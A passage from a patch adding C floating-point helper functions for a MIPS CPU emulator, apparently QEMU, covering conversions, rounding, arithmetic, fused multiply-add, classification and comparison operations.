excp, excph; + + wt2 = float32_to_int32(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + excp = get_float_exception_flags(&env->active_fpu.fp_status); + if (excp & (float_flag_overflow | float_flag_invalid)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + + set_float_exception_flags(0, &env->active_fpu.fp_status); + wth2 = float32_to_int32(fdt0 >> 32, &env->active_fpu.fp_status); + excph = get_float_exception_flags(&env->active_fpu.fp_status); + if (excph & (float_flag_overflow | float_flag_invalid)) { + wth2 = FP_TO_INT32_OVERFLOW; + } + + set_float_exception_flags(excp | excph, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + + return ((uint64_t)wth2 << 32) | wt2; +} + +uint32_t helper_float_cvts_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + + fst2 = float64_to_float32(fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t helper_float_cvts_w(CPUMIPSState *env, uint32_t wt0) +{ + uint32_t fst2; + + fst2 = int32_to_float32(wt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t helper_float_cvts_l(CPUMIPSState *env, uint64_t dt0) +{ + uint32_t fst2; + + fst2 = int64_to_float32(dt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t helper_float_cvts_pl(CPUMIPSState *env, uint32_t wt0) +{ + uint32_t wt2; + + wt2 = wt0; + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_cvts_pu(CPUMIPSState *env, uint32_t wth0) +{ + uint32_t wt2; + + wt2 = wth0; + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_cvtw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + return wt2; +} + +uint32_t helper_float_cvtw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_roundl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_roundl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_roundw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_roundw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_truncl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_truncl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + dt2 = float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_truncw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_truncw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_ceill_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_ceill_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_ceilw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_ceilw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_floorl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_floorl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_floorw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_floorw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +/* unary operations, not modifying fp status */ +#define FLOAT_UNOP(name) \ +uint64_t helper_float_ ## name ## _d(uint64_t fdt0) \ +{ \ + return float64_ ## name(fdt0); \ +} \ +uint32_t helper_float_ ## name ## _s(uint32_t fst0) \ +{ \ + return float32_ ## name(fst0); \ +} \ +uint64_t helper_float_ ## name ## _ps(uint64_t fdt0) \ +{ \ + uint32_t wt0; \ + uint32_t wth0; \ + \ + wt0 = float32_ ## name(fdt0 & 0XFFFFFFFF); \ + wth0 = float32_ ## name(fdt0 >> 32); \ + return ((uint64_t)wth0 << 32) | wt0; \ +} +FLOAT_UNOP(abs) +FLOAT_UNOP(chs) +#undef FLOAT_UNOP + +#define FLOAT_FMADDSUB(name, bits, muladd_arg) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs, \ + uint ## bits ## _t ft, \ + uint ## bits ## _t fd) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _muladd(fs, ft, fd, muladd_arg, \ + &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_FMADDSUB(maddf_s, 32, 0) +FLOAT_FMADDSUB(maddf_d, 64, 0) +FLOAT_FMADDSUB(msubf_s, 32, float_muladd_negate_product) +FLOAT_FMADDSUB(msubf_d, 64, float_muladd_negate_product) +#undef FLOAT_FMADDSUB + +#define FLOAT_MINMAX(name, bits, minmaxfunc) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs, \ + uint ## bits ## _t ft) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _ ## minmaxfunc(fs, ft, \ + &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_MINMAX(max_s, 32, maxnum) +FLOAT_MINMAX(max_d, 64, maxnum) +FLOAT_MINMAX(maxa_s, 32, maxnummag) +FLOAT_MINMAX(maxa_d, 64, maxnummag) + +FLOAT_MINMAX(min_s, 32, minnum) +FLOAT_MINMAX(min_d, 64, minnum) +FLOAT_MINMAX(mina_s, 32, minnummag) +FLOAT_MINMAX(mina_d, 64, minnummag) +#undef FLOAT_MINMAX + +#define FLOAT_RINT(name, bits) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _round_to_int(fs, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_RINT(rint_s, 32) +FLOAT_RINT(rint_d, 64) +#undef FLOAT_RINT + +#define FLOAT_CLASS_SIGNALING_NAN 0x001 +#define FLOAT_CLASS_QUIET_NAN 0x002 +#define FLOAT_CLASS_NEGATIVE_INFINITY 0x004 +#define FLOAT_CLASS_NEGATIVE_NORMAL 0x008 +#define FLOAT_CLASS_NEGATIVE_SUBNORMAL 0x010 +#define FLOAT_CLASS_NEGATIVE_ZERO 0x020 +#define FLOAT_CLASS_POSITIVE_INFINITY 0x040 +#define FLOAT_CLASS_POSITIVE_NORMAL 0x080 +#define FLOAT_CLASS_POSITIVE_SUBNORMAL 0x100 +#define FLOAT_CLASS_POSITIVE_ZERO 0x200 + +#define FLOAT_CLASS(name, bits) \ +uint ## bits ## _t helper_float_ ## name (uint ## bits ## _t arg) \ +{ \ + if (float ## bits ## _is_signaling_nan(arg)) { \ + return FLOAT_CLASS_SIGNALING_NAN; \ + } else if (float ## bits ## _is_quiet_nan(arg)) { \ + return FLOAT_CLASS_QUIET_NAN; \ + } else if (float ## bits ## _is_neg(arg)) { \ + if (float ## bits ## _is_infinity(arg)) { \ + return FLOAT_CLASS_NEGATIVE_INFINITY; \ + } else if (float ## bits ## _is_zero(arg)) { \ + return FLOAT_CLASS_NEGATIVE_ZERO; \ + } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ + return FLOAT_CLASS_NEGATIVE_SUBNORMAL; \ + } else { \ + return FLOAT_CLASS_NEGATIVE_NORMAL; \ + } \ + } else { \ + if (float ## bits ## _is_infinity(arg)) { \ + return FLOAT_CLASS_POSITIVE_INFINITY; \ + } else if (float ## bits ## _is_zero(arg)) { \ + return FLOAT_CLASS_POSITIVE_ZERO; \ + } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ + return FLOAT_CLASS_POSITIVE_SUBNORMAL; \ + } else { \ + return FLOAT_CLASS_POSITIVE_NORMAL; \ + } \ + } \ +} + +FLOAT_CLASS(class_s, 32) +FLOAT_CLASS(class_d, 64) +#undef FLOAT_CLASS + +/* MIPS specific unary operations */ +uint64_t helper_float_recip_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip1_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip1_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip1_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_div(float32_one, fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = float32_div(float32_one, fdt0 >> 32, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_rsqrt1_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt1_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt1_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_sqrt(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = float32_sqrt(fdt0 >> 32, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + fsth2 = float32_div(float32_one, fsth2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +#define FLOAT_OP(name, p) void helper_float_##name##_##p(CPUMIPSState *env) + +/* binary operations */ +#define FLOAT_BINOP(name) \ +uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1) \ +{ \ + uint64_t dt2; \ + \ + dt2 = float64_ ## name (fdt0, fdt1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return dt2; \ +} \ + \ +uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ + uint32_t fst0, uint32_t fst1) \ +{ \ + uint32_t wt2; \ + \ + wt2 = float32_ ## name (fst0, fst1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return wt2; \ +} \ + \ +uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ + uint64_t fdt0, \ + uint64_t fdt1) \ +{ \ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ + uint32_t fsth0 = fdt0 >> 32; \ + uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ + uint32_t fsth1 = fdt1 >> 32; \ + uint32_t wt2; \ + uint32_t wth2; \ + \ + wt2 = float32_ ## name (fst0, fst1, &env->active_fpu.fp_status); \ + wth2 = float32_ ## name (fsth0, fsth1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return ((uint64_t)wth2 << 32) | wt2; \ +} + +FLOAT_BINOP(add) +FLOAT_BINOP(sub) +FLOAT_BINOP(mul) +FLOAT_BINOP(div) +#undef FLOAT_BINOP + +#define UNFUSED_FMA(prefix, a, b, c, flags) \ +{ \ + a = prefix##_mul(a, b, &env->active_fpu.fp_status); \ + if ((flags) & float_muladd_negate_c) { \ + a = prefix##_sub(a, c, &env->active_fpu.fp_status); \ + } else { \ + a = prefix##_add(a, c, &env->active_fpu.fp_status); \ + } \ + if ((flags) & float_muladd_negate_result) { \ + a = prefix##_chs(a); \ + } \ +} + +/* FMA based operations */ +#define FLOAT_FMA(name, type) \ +uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1, \ + uint64_t fdt2) \ +{ \ + UNFUSED_FMA(float64, fdt0, fdt1, fdt2, type); \ + update_fcr31(env, GETPC()); \ + return fdt0; \ +} \ + \ +uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ + uint32_t fst0, uint32_t fst1, \ + uint32_t fst2) \ +{ \ + UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ + update_fcr31(env, GETPC()); \ + return fst0; \ +} \ + \ +uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1, \ + uint64_t fdt2) \ +{ \ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ + uint32_t fsth0 = fdt0 >> 32; \ + uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ + uint32_t fsth1 = fdt1 >> 32; \ + uint32_t fst2 = fdt2 & 0XFFFFFFFF; \ + uint32_t fsth2 = fdt2 >> 32; \ + \ + UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ + UNFUSED_FMA(float32, fsth0, fsth1, fsth2, type); \ + update_fcr31(env, GETPC()); \ + return ((uint64_t)fsth0 << 32) | fst0; \ +} +FLOAT_FMA(madd, 0) +FLOAT_FMA(msub, float_muladd_negate_c) +FLOAT_FMA(nmadd, float_muladd_negate_result) +FLOAT_FMA(nmsub, float_muladd_negate_result | float_muladd_negate_c) +#undef FLOAT_FMA + +/* MIPS specific binary operations */ +uint64_t helper_float_recip2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); + fdt2 = float64_chs(float64_sub(fdt2, float64_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) +{ + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst2 = fdt2 & 0XFFFFFFFF; + uint32_t fsth2 = fdt2 >> 32; + + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); + fsth2 = float32_chs(float32_sub(fsth2, float32_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_rsqrt2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); + fdt2 = float64_sub(fdt2, float64_one, &env->active_fpu.fp_status); + fdt2 = float64_chs(float64_div(fdt2, FLOAT_TWO64, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) +{ + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst2 = fdt2 & 0XFFFFFFFF; + uint32_t fsth2 = fdt2 >> 32; + + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); + fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); + fsth2 = float32_sub(fsth2, float32_one, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); + fsth2 = float32_chs(float32_div(fsth2, FLOAT_TWO32, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_addr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst1 = fdt1 & 0XFFFFFFFF; + uint32_t fsth1 = fdt1 >> 32; + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_add (fst0, fsth0, &env->active_fpu.fp_status); + fsth2 = float32_add (fst1, fsth1, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_mulr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst1 = fdt1 & 0XFFFFFFFF; + uint32_t fsth1 = fdt1 >> 32; + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_mul (fst0, fsth0, &env->active_fpu.fp_status); + fsth2 = float32_mul (fst1, fsth1, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +/* compare operations */ +#define FOP_COND_D(op, cond) \ +void helper_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + int c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} \ +void helper_cmpabs_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + int c; \ + fdt0 = float64_abs(fdt0); \ + fdt1 = float64_abs(fdt1); \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered_quiet() is still called. */ +FOP_COND_D(f, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_COND_D(un, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status)) +FOP_COND_D(eq, float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ueq, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(olt, float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ult, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ole, float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ule, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered() is still called. */ +FOP_COND_D(sf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_COND_D(ngle,float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status)) +FOP_COND_D(seq, float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ngl, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(lt, float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(nge, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(le, float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ngt, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) + +#define FOP_COND_S(op, cond) \ +void helper_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ + uint32_t fst1, int cc) \ +{ \ + int c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} \ +void helper_cmpabs_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ + uint32_t fst1, int cc) \ +{ \ + int c; \ + fst0 = float32_abs(fst0); \ + fst1 = float32_abs(fst1); \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered_quiet() is still called. */ +FOP_COND_S(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_COND_S(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status)) +FOP_COND_S(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. */ +FOP_COND_S(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_COND_S(ngle,float32_unordered(fst1, fst0, &env->active_fpu.fp_status)) +FOP_COND_S(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, 